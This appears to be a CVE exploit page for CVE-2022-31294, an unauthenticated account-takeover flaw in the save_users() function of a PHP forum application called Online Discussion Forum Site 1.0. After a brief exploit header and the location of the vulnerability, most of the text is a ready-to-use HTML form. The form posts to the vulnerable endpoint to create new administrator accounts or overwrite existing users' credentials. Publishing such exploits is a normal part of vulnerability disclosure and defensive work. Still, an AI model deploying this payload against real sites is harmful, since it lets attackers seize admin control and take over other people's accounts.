Headline
CVE-2022-31294: GitHub - bigzooooz/CVE-2022-31294: Online Discussion Forum Site 1.0 - Account Takeover
An issue in the save_users() function of Online Discussion Forum Site 1 allows unauthenticated attackers to arbitrarily create or update user accounts.
CVE-2022-31294
Online Discussion Forum Site 1.0 - Account Takeover
Exploit Title: Online Discussion Forum Site 1.0 - CSRF Create New/Update Existing Admin User [Account Takeover]****Date: 2022-06-13****CVE: CVE-2022-31294****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html****Version: 1.0****Tested on: LAMP, Ubuntu
[#] Vulnerability Location: function save_users() in /odfs/classes/Users.php:13
[#] Exploitation: <form action="http://localhost/odfs/classes/Users.php?f=save" method="post" id="manage-user"> <input type="text" name="id" value="" placeholder="Keep empty if you want to create new user / put user ID to edit existing user"> <div class="form-group"> <label for="name">First Name</label> <input type="text" name="firstname" id="firstname" class="form-control" value="" required> </div> <div class="form-group"> <label for="name">Middle Name</label> <input type="text" name="middlename" id="middlename" class="form-control" value=""> </div> <div class="form-group"> <label for="name">Last Name</label> <input type="text" name="lastname" id="lastname" class="form-control" value="" required> </div> <div class="form-group"> <label for="username">Username</label> <input type="text" name="username" id="username" class="form-control" value="" required autocomplete="off"> </div> <div class="form-group"> <label for="password"> Password</label> <input type="password" name="password" id="password" class="form-control" value="" autocomplete="off"> </div> <div class="form-group"> <label for="type" class="control-label">Type</label> <select name="type" id="type" class="form-control form-control-sm rounded-0" required> <option value="1" >Administrator</option> <option value="2" >Registered User</option> </select> </div> <button type="submit">Save</button> </form>